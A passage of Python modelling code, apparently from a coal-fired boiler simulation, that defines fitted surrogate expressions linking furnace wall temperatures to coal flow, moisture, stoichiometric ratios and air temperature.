-74.5573 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-0.202341 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 3] \
-52.6317 * b.wall_temperature_waterwall[t, 2]*b.flowrate_coal_raw[t] \
+0.243508 * b.wall_temperature_waterwall[t, 2]*b.secondary_air_inlet.temperature[t] \
-39.6689 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
-0.320972 * b.wall_temperature_waterwall[t, 3]*b.wall_temperature_waterwall[t, 4] \
-9.03032 * b.wall_temperature_waterwall[t, 3]*b.flowrate_coal_raw[t] \
+1.08186 * b.wall_temperature_waterwall[t, 3]*b.secondary_air_inlet.temperature[t] \
+0.525868 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
-39.011 * b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t] \
+4489.28 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
-629.837 * b.wall_temperature_waterwall[t, 5]*b.SR_lf[t] \
+44.344 * b.wall_temperature_waterwall[t, 5]*b.ratio_PA2coal[t] \
+1.72535 * b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t] \
+796.63 * b.wall_temperature_waterwall[t, 7]*b.mf_H2O_coal_raw[t] \
+0.282511 * b.wall_temperature_waterwall[t, 7]*b.secondary_air_inlet.temperature[t] \
+0.447853 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_waterwall[t, 12] \
-0.343465 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_platen[t] \
-32.6091 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+1107.94 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
+0.0605128 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 11] \
-0.463551 * b.wall_temperature_platen[t]*b.wall_temperature_roof[t] \
+6.50059 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
-1051.37 * b.wall_temperature_platen[t]*b.mf_H2O_coal_raw[t] \
-6.1049 * b.wall_temperature_platen[t]*b.ratio_PA2coal[t] \
-5465.56 * b.wall_temperature_roof[t]*b.mf_H2O_coal_raw[t] \
+0.833308 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-1.75056e+06 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-183240 * b.flowrate_coal_raw[t]*b.SR[t] \
-310130 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+957.014 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-39804.2 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+4.49631e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
+2.16414e+07 * b.mf_H2O_coal_raw[t]*b.SR_lf[t] \
-19740 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-4.21302e+06 * b.SR[t]*b.SR_lf[t] \
+132221 * b.SR[t]*b.ratio_PA2coal[t] \
+20016.4 * b.SR_lf[t]*b.secondary_air_inlet.temperature[t] \
-2318.51 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.000979408 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
+0.000719763 * (b.wall_temperature_waterwall[t, 2]*b.flowrate_coal_raw[t])**2 \
+0.000572793 * (b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t])**2 \
-1.27643 * (b.wall_temperature_waterwall[t, 4]*b.SR[t])**2 \
+0.000450081 * (b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t])**2 \
+140272 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
+666.822 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-3994.96 * (b.flowrate_coal_raw[t]*b.SR_lf[t])**2 \
-0.00660786 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+85.0348 * (b.flowrate_coal_raw[t]*b.ratio_PA2coal[t])**2 \
+0.102891 * (b.wall_temperature_roof[t]*b.mf_H2O_coal_raw[t])**3 \
-7838.06 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**3)",
2: "(9402.37 * b.wall_temperature_waterwall[t, 1] \
+63618 * b.wall_temperature_waterwall[t, 2] \
+2118.88 * b.wall_temperature_waterwall[t, 3] \
+1821.84 * b.wall_temperature_waterwall[t, 4] \
-24586.5 * b.wall_temperature_waterwall[t, 5] \
+166.046 * b.wall_temperature_waterwall[t, 6] \
+695.921 * b.wall_temperature_waterwall[t, 7] \
+1070.12 * b.wall_temperature_waterwall[t, 8] \
-231.135 * b.wall_temperature_waterwall[t, 9] \
+18.6849 * b.wall_temperature_waterwall[t, 12] \
+1794.21 * b.wall_temperature_platen[t] \
+2842.9 * b.wall_temperature_roof[t] \
+2.04728e+06 * b.flowrate_coal_raw[t] \
+9.13283e+07 * b.mf_H2O_coal_raw[t] \
+6.91793e+06 * b.SR[t] \
+4.81359e+08 * b.SR_lf[t] \
-40341.5 * b.secondary_air_inlet.temperature[t] \
+1.1322e+06 * b.ratio_PA2coal[t] \
-4.24844e+06 * log(b.wall_temperature_waterwall[t, 1]) \
-1.67693e+07 * log(b.wall_temperature_waterwall[t, 2]) \
-1.2861e+06 * log(b.wall_temperature_waterwall[t, 3]) \
-4.45769e+06 * log(b.wall_temperature_waterwall[t, 4]) \
+9.0161e+06 * log(b.wall_temperature_waterwall[t, 5]) \
-537334 * log(b.wall_temperature_waterwall[t, 8]) \
+181486 * log(b.wall_temperature_waterwall[t, 9]) \
-715084 * log(b.wall_temperature_platen[t]) \
+4.61896e+06 * log(b.flowrate_coal_raw[t]) \
+30243.2 * log(b.mf_H2O_coal_raw[t]) \
-8.42989e+06 * log(b.SR[t]) \
-1.45952e+08 * log(b.SR_lf[t]) \
+9.65255e+06 * log(b.secondary_air_inlet.temperature[t]) \
+490346 * log(b.ratio_PA2coal[t]) \
-1.04352e+08 * exp(b.mf_H2O_coal_raw[t]) \
-1.24828e+08 * exp(b.SR_lf[t]) \
-30.804 * b.wall_temperature_waterwall[t, 2]**2 \
+9.2668 * b.wall_temperature_waterwall[t, 5]**2 \
-21962.3 * b.flowrate_coal_raw[t]**2 \
+185.889 * b.flowrate_coal_raw[t]**3 \
+0.0096263 * b.secondary_air_inlet.temperature[t]**3 \
-76.1054 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-81.3516 * b.wall_temperature_waterwall[t, 2]*b.flowrate_coal_raw[t] \
+1570.34 * b.wall_temperature_waterwall[t, 2]*b.mf_H2O_coal_raw[t] \
-2440.82 * b.wall_temperature_waterwall[t, 2]*b.SR_lf[t] \
+0.527827 * b.wall_temperature_waterwall[t, 2]*b.secondary_air_inlet.temperature[t] \
-31.6806 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
-11.9902 * b.wall_temperature_waterwall[t, 3]*b.flowrate_coal_raw[t] \
+1.17551 * b.wall_temperature_waterwall[t, 3]*b.secondary_air_inlet.temperature[t] \
+0.712584 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
-8.98673 * b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t] \
+6307.56 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
+1.03784 * b.wall_temperature_waterwall[t, 4]*b.secondary_air_inlet.temperature[t] \
-3.53159 * b.wall_temperature_waterwall[t, 5]*b.flowrate_coal_raw[t] \
-1225.87 * b.wall_temperature_waterwall[t, 5]*b.SR_lf[t] \
+85.2083 * b.wall_temperature_waterwall[t, 5]*b.ratio_PA2coal[t] \
+656.338 * b.wall_temperature_waterwall[t, 7]*b.mf_H2O_coal_raw[t] \
-674.09 * b.wall_temperature_waterwall[t, 7]*b.SR_lf[t] \
-0.265762 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_platen[t] \
-8.30267 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+1227.37 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
+0.0526552 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 11] \
-0.407706 * b.wall_temperature_platen[t]*b.wall_temperature_roof[t] \
+7.81514 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
-1118.85 * b.wall_temperature_platen[t]*b.mf_H2O_coal_raw[t] \
-15.2498 * b.wall_temperature_platen[t]*b.ratio_PA2coal[t] \
-4845.51 * b.wall_temperature_roof[t]*b.mf_H2O_coal_raw[t] \
-3234.16 * b.wall_temperature_roof[t]*b.SR_lf[t] \
+0.69596 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-1.8204e+06 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-159924 * b.flowrate_coal_raw[t]*b.SR[t] \
-398436 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+1029.33 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-42896.7 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+3.55413e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
+2.26223e+07 * b.mf_H2O_coal_raw[t]*b.SR_lf[t] \
-20279.8 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-3.77353e+06 * b.SR[t]*b.SR_lf[t] \
+308.059 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
+107358 * b.SR[t]*b.ratio_PA2coal[t] \
+20666.6 * b.SR_lf[t]*b.secondary_air_inlet.temperature[t] \
-2564.62 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.00107543 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
+0.000875275 * (b.wall_temperature_waterwall[t, 2]*b.flowrate_coal_raw[t])**2 \
-1.75451 * (b.wall_temperature_waterwall[t, 4]*b.SR[t])**2 \
+149896 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
+654.854 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-3875.11 * (b.flowrate_coal_raw[t]*b.SR_lf[t])**2 \
-0.00723196 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+91.9401 * (b.flowrate_coal_raw[t]*b.ratio_PA2coal[t])**2 \
+0.0961783 * (b.wall_temperature_roof[t]*b.mf_H2O_coal_raw[t])**3 \
-8608.57 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**3)",
3: "(2825.25 * b.wall_temperature_waterwall[t, 1] \
+3496.16 * b.wall_temperature_waterwall[t, 2] \
+39611.4 * b.wall_temperature_waterwall[t, 3] \
+2064.54 * b.wall_temperature_waterwall[t, 4] \
-19353.7 * b.wall_temperature_waterwall[t, 5] \
+140.98 * b.wall_temperature_waterwall[t, 6] \
-95.4723 * b.wall_temperature_waterwall[t, 7] \
+180.791 * b.wall_temperature_waterwall[t, 8] \
+20.6861 * b.wall_temperature_waterwall[t, 12] \
-77.5609 * b.wall_temperature_platen[t] \
+1.76659e+06 * b.flowrate_coal_raw[t] \
+2.73809e+07 * b.mf_H2O_coal_raw[t] \
+1.30314e+07 * b.SR[t] \
+2.99323e+08 * b.SR_lf[t] \
-8992.63 * b.secondary_air_inlet.temperature[t] \
+743538 * b.ratio_PA2coal[t] \
-1.21925e+06 * log(b.wall_temperature_waterwall[t, 1]) \
-1.70788e+06 * log(b.wall_temperature_waterwall[t, 2]) \
-1.11283e+07 * log(b.wall_temperature_waterwall[t, 3]) \
-1.15967e+06 * log(b.wall_temperature_waterwall[t, 4]) \
+6.95686e+06 * log(b.wall_temperature_waterwall[t, 5]) \
+3.12918e+06 * log(b.flowrate_coal_raw[t]) \
+86928.8 * log(b.mf_H2O_coal_raw[t]) \
-1.11133e+07 * log(b.SR[t]) \
-8.27815e+07 * log(b.SR_lf[t]) \
+317858 * log(b.ratio_PA2coal[t]) \
-4.84182e+07 * exp(b.mf_H2O_coal_raw[t]) \
-969324 * exp(b.SR[t]) \
-8.1132e+07 * exp(b.SR_lf[t]) \
-20.0424 * b.wall_temperature_waterwall[t, 3]**2 \
+7.21081 * b.wall_temperature_waterwall[t, 5]**2 \
+0.177218 * b.wall_temperature_waterwall[t, 8]**2 \
+0.469474 * b.wall_temperature_platen[t]**2 \
-19318.5 * b.flowrate_coal_raw[t]**2 \
+3.33513 * b.secondary_air_inlet.temperature[t]**2 \
+149.518 * b.flowrate_coal_raw[t]**3 \
-29.4453 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-32.348 * b.wall_temperature_waterwall[t, 2]*b.flowrate_coal_raw[t] \
+0.37361 * b.wall_temperature_waterwall[t, 2]*b.secondary_air_inlet.temperature[t] \
-49.1179 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
-0.0559492 * b.wall_temperature_waterwall[t, 3]*b.wall_temperature_waterwall[t, 8] \
-24.6599 * b.wall_temperature_waterwall[t, 3]*b.flowrate_coal_raw[t] \
+1.0472 * b.wall_temperature_waterwall[t, 3]*b.secondary_air_inlet.temperature[t] \
+0.051371 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 8] \
+0.291925 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
-7.09556 * b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t] \
-579.937 * b.wall_temperature_waterwall[t, 5]*b.SR_lf[t] \
+30.4256 * b.wall_temperature_waterwall[t, 5]*b.ratio_PA2coal[t] \
+0.187627 * b.wall_temperature_waterwall[t, 7]*b.wall_temperature_roof[t] \
+506.243 * b.wall_temperature_waterwall[t, 7]*b.mf_H2O_coal_raw[t] \
-0.209174 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_platen[t] \
-27.8211 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+808.58 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
+0.0378872 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 11] \
-0.427984 * b.wall_temperature_platen[t]*b.wall_temperature_roof[t] \
+3.97146 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
-2.56524 * b.wall_temperature_platen[t]*b.ratio_PA2coal[t] \
-1.1316e+06 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-149208 * b.flowrate_coal_raw[t]*b.SR[t] \
-620763 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+692.429 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-27383.3 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+2.74367e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
+2.19307e+07 * b.mf_H2O_coal_raw[t]*b.SR_lf[t] \
-12923.6 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-1.89277e+06 * b.SR[t]*b.SR_lf[t] \
+538.573 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
+91705.4 * b.SR[t]*b.ratio_PA2coal[t] \
+9695.45 * b.SR_lf[t]*b.secondary_air_inlet.temperature[t] \
-1698.89 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.000466813 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
+0.000489048 * (b.wall_temperature_waterwall[t, 2]*b.flowrate_coal_raw[t])**2 \
-0.0629385 * (b.wall_temperature_waterwall[t, 4]*b.SR[t])**2 \
+0.000414 * (b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t])**2 \
+94334.8 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
+647.348 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-0.00513905 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+57.4901 * (b.flowrate_coal_raw[t]*b.ratio_PA2coal[t])**2 \
-5271.02 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**3)",
4: "(30998 * b.wall_temperature_waterwall[t, 1] \
+2457.99 * b.wall_temperature_waterwall[t, 2] \
+1137.13 * b.wall_temperature_waterwall[t, 3] \
+19608.1 * b.wall_temperature_waterwall[t, 4] \
-19918.2 * b.wall_temperature_waterwall[t, 5] \
+919.01 * b.wall_temperature_waterwall[t, 6] \
+369.947 * b.wall_temperature_waterwall[t, 7] \
+646.454 * b.wall_temperature_waterwall[t, 8] \
+102.897 * b.wall_temperature_waterwall[t, 10] \
+24.8228 * b.wall_temperature_waterwall[t, 12] \
+1739.59 * b.wall_temperature_platen[t] \
+1.89204e+06 * b.flowrate_coal_raw[t] \
+6.68693e+07 * b.mf_H2O_coal_raw[t] \
+4.63505e+06 * b.SR[t] \
+4.53751e+08 * b.SR_lf[t] \
+1612.6 * b.secondary_air_inlet.temperature[t] \
+924842 * b.ratio_PA2coal[t] \
-1.07435e+07 * log(b.wall_temperature_waterwall[t, 1]) \
-1.48504e+06 * log(b.wall_temperature_waterwall[t, 2]) \
-750102 * log(b.wall_temperature_waterwall[t, 3]) \
-7.28634e+06 * log(b.wall_temperature_waterwall[t, 4]) \
+7.19016e+06 * log(b.wall_temperature_waterwall[t, 5]) \
-342011 * log(b.wall_temperature_waterwall[t, 6]) \
-465932 * log(b.wall_temperature_waterwall[t, 7]) \
-275633 * log(b.wall_temperature_waterwall[t, 8]) \
-500395 * log(b.wall_temperature_platen[t]) \
+3.33092e+06 * log(b.flowrate_coal_raw[t]) \
-1.06661e+07 * log(b.SR[t]) \
-1.71633e+08 * log(b.SR_lf[t]) \
-3.18827e+06 * log(b.secondary_air_inlet.temperature[t]) \
-8.32439e+07 * exp(b.mf_H2O_coal_raw[t]) \
-1.05477e+08 * exp(b.SR_lf[t]) \
-10.3499 * b.wall_temperature_waterwall[t, 1]**2 \
-12.7144 * b.wall_temperature_waterwall[t, 4]**2 \
+7.8685 * b.wall_temperature_waterwall[t, 5]**2 \
-19144.9 * b.flowrate_coal_raw[t]**2 \
+143.33 * b.flowrate_coal_raw[t]**3 \
-24.1862 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-28.4264 * b.wall_temperature_waterwall[t, 1]*b.mf_H2O_coal_raw[t] \
-312.37 * b.wall_temperature_waterwall[t, 1]*b.SR_lf[t] \
-3.62923 * b.wall_temperature_waterwall[t, 2]*b.flowrate_coal_raw[t] \
+0.58587 * b.wall_temperature_waterwall[t, 2]*b.secondary_air_inlet.temperature[t] \
-20.9999 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
-4.26059 * b.wall_temperature_waterwall[t, 3]*b.flowrate_coal_raw[t] \
+0.849726 * b.wall_temperature_waterwall[t, 3]*b.secondary_air_inlet.temperature[t] \
+0.383348 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
-31.1716 * b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t] \
+6795.15 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
-0.334707 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 6] \
+0.0296533 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_roof[t] \
-6.75789 * b.wall_temperature_waterwall[t, 5]*b.flowrate_coal_raw[t] \
-887.887 * b.wall_temperature_waterwall[t, 5]*b.SR_lf[t] \
+54.121 * b.wall_temperature_waterwall[t, 5]*b.ratio_PA2coal[t] \
+0.390219 * b.wall_temperature_waterwall[t, 7]*b.wall_temperature_roof[t] \
+617.963 * b.wall_temperature_waterwall[t, 7]*b.mf_H2O_coal_raw[t] \
-354.236 * b.wall_temperature_waterwall[t, 7]*b.SR_lf[t] \
+0.668885 * b.wall_temperature_waterwall[t, 7]*b.secondary_air_inlet.temperature[t] \
+0.368313 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_waterwall[t, 10] \
-0.224167 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_platen[t] \
-32.5371 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+944.267 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
-0.444565 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_platen[t] \
+482.957 * b.wall_temperature_waterwall[t, 11]*b.mf_H2O_coal_raw[t] \
-0.448545 * b.wall_temperature_platen[t]*b.wall_temperature_roof[t] \
-92.9318 * b.wall_temperature_roof[t]*b.ratio_PA2coal[t] \
-965339 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-238814 * b.flowrate_coal_raw[t]*b.SR[t] \
-656822 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+742.242 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-26766.3 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
-1.27395e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
+2.30581e+07 * b.mf_H2O_coal_raw[t]*b.SR_lf[t] \
-13952.1 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-269639 * b.mf_H2O_coal_raw[t]*b.ratio_PA2coal[t] \
+841.556 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
+84459.4 * b.SR[t]*b.ratio_PA2coal[t] \
+7494.08 * b.SR_lf[t]*b.secondary_air_inlet.temperature[t] \
-1672.75 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.000370175 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
-1.84302 * (b.wall_temperature_waterwall[t, 4]*b.SR[t])**2 \
+0.000463608 * (b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t])**2 \
+45660.1 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
+978.377 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-0.00577998 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+51.3598 * (b.flowrate_coal_raw[t]*b.ratio_PA2coal[t])**2 \
+1.03552e+07 * (b.mf_H2O_coal_raw[t]*b.SR[t])**2)",
5: "(1381.36 * b.wall_temperature_waterwall[t, 1] \
+2323.67 * b.wall_temperature_waterwall[t, 2] \
+16.5773 * b.wall_temperature_waterwall[t, 3] \
+1352.22 * b.wall_temperature_waterwall[t, 4] \
-16466.5 * b.wall_temperature_waterwall[t, 5] \
+899.714 * b.wall_temperature_waterwall[t, 6] \
+3.93998 * b.wall_temperature_waterwall[t, 7] \
+1266.5 * b.wall_temperature_waterwall[t, 8] \
+27.0207 * b.wall_temperature_waterwall[t, 12] \
+1538.23 * b.wall_temperature_platen[t] \
+2873.09 * b.wall_temperature_roof[t] \
+1.97605e+06 * b.flowrate_coal_raw[t] \
-1.23146e+08 * b.mf_H2O_coal_raw[t] \
+7.90727e+06 * b.SR[t] \
-8.28156e+07 * b.SR_lf[t] \
+8409.65 * b.secondary_air_inlet.temperature[t] \
+771488 * b.ratio_PA2coal[t] \
-512140 * log(b.wall_temperature_waterwall[t, 1]) \
-960400 * log(b.wall_temperature_waterwall[t, 2]) \
-1.69396e+06 * log(b.wall_temperature_waterwall[t, 5]) \
-578390 * log(b.wall_temperature_waterwall[t, 8]) \
-500164 * log(b.wall_temperature_platen[t]) \
+3.27151e+06 * log(b.flowrate_coal_raw[t]) \
-207751 * log(b.mf_H2O_coal_raw[t]) \
-1.3498e+07 * log(b.SR[t]) \
+7.59142e+07 * log(b.SR_lf[t]) \
-3.4224e+06 * log(b.secondary_air_inlet.temperature[t]) \
+1.08294e+08 * exp(b.mf_H2O_coal_raw[t]) \
+0.728811 * b.wall_temperature_waterwall[t, 4]**2 \
-18833.1 * b.flowrate_coal_raw[t]**2 \
-9.85614e+07 * b.mf_H2O_coal_raw[t]**2 \
+120.533 * b.flowrate_coal_raw[t]**3 \
-0.0492326 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 11] \
-22.6501 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-0.453682 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-0.372273 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_platen[t] \
+0.420252 * b.wall_temperature_waterwall[t, 2]*b.secondary_air_inlet.temperature[t] \
-78.644 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
-0.548922 * b.wall_temperature_waterwall[t, 3]*b.wall_temperature_waterwall[t, 4] \
+0.782376 * b.wall_temperature_waterwall[t, 3]*b.wall_temperature_waterwall[t, 11] \
+176.927 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
-0.0216351 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 8] \
+0.521495 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
-23.7278 * b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t] \
-354.669 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
-1800.24 * b.wall_temperature_waterwall[t, 4]*b.SR_lf[t] \
+1.00785 * b.wall_temperature_waterwall[t, 4]*b.secondary_air_inlet.temperature[t] \
-0.320146 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 6] \
-36.3443 * b.wall_temperature_waterwall[t, 5]*b.flowrate_coal_raw[t] \
-276.22 * b.wall_temperature_waterwall[t, 5]*b.SR[t] \
+31986.7 * b.wall_temperature_waterwall[t, 5]*b.SR_lf[t] \
-33.1281 * b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t] \
+0.337834 * b.wall_temperature_waterwall[t, 7]*b.secondary_air_inlet.temperature[t] \
-22.6854 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+0.0949332 * b.wall_temperature_waterwall[t, 9]*b.wall_temperature_waterwall[t, 10] \
-0.836476 * b.wall_temperature_waterwall[t, 11]*b.secondary_air_inlet.temperature[t] \
-0.524954 * b.wall_temperature_platen[t]*b.wall_temperature_roof[t] \
+3.06373 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+424.529 * b.wall_temperature_roof[t]*b.mf_H2O_coal_raw[t] \
-2856.66 * b.wall_temperature_roof[t]*b.SR_lf[t] \
-983765 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-407939 * b.flowrate_coal_raw[t]*b.SR[t] \
-532340 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+744.637 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-24675.1 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+6.59033e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
+1.76578e+07 * b.mf_H2O_coal_raw[t]*b.SR_lf[t] \
-14012.2 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
+2047.81 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
+136654 * b.SR[t]*b.ratio_PA2coal[t] \
-1520.71 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.000356587 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
+0.000348091 * (b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t])**2 \
-11.5928 * (b.wall_temperature_waterwall[t, 5]*b.SR_lf[t])**2 \
+0.000500883 * (b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t])**2 \
+0.000224347 * (b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t])**2 \
-0.0108347 * (b.wall_temperature_roof[t]*b.ratio_PA2coal[t])**2 \
+46556.5 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
+1577.66 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-0.00554362 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+43.5639 * (b.flowrate_coal_raw[t]*b.ratio_PA2coal[t])**2)",
6: "(23766.1 * b.wall_temperature_waterwall[t, 1] \
+1109.67 * b.wall_temperature_waterwall[t, 2] \
-411.801 * b.wall_temperature_waterwall[t, 3] \
+1277.07 * b.wall_temperature_waterwall[t, 4] \
+1664.61 * b.wall_temperature_waterwall[t, 5] \
-144143 * b.wall_temperature_waterwall[t, 6] \
+321.352 * b.wall_temperature_waterwall[t, 7] \
+2667.15 * b.wall_temperature_waterwall[t, 8] \
+812.223 * b.wall_temperature_waterwall[t, 9] \
+278.07 * b.wall_temperature_waterwall[t, 10] \
-357.846 * b.wall_temperature_waterwall[t, 11] \
+955.339 * b.wall_temperature_waterwall[t, 12] \
+1101.44 * b.wall_temperature_platen[t] \
-1083.91 * b.wall_temperature_roof[t] \
+1.87747e+06 * b.flowrate_coal_raw[t] \
+6.52201e+07 * b.mf_H2O_coal_raw[t] \
+1.15786e+07 * b.SR[t] \
+78146.6 * b.SR_lf[t] \
+8886.98 * b.secondary_air_inlet.temperature[t] \
+349860 * b.ratio_PA2coal[t] \
-1.03956e+07 * log(b.wall_temperature_waterwall[t, 1]) \
+410736 * log(b.wall_temperature_waterwall[t, 3]) \
+2.84904e+07 * log(b.wall_temperature_waterwall[t, 6]) \
-982762 * log(b.wall_temperature_waterwall[t, 8]) \
-638942 * log(b.wall_temperature_platen[t]) \
+2.51419e+06 * log(b.flowrate_coal_raw[t]) \
-355831 * log(b.mf_H2O_coal_raw[t]) \
-3.22971e+07 * log(b.SR[t]) \
-3.53833e+06 * log(b.secondary_air_inlet.temperature[t]) \
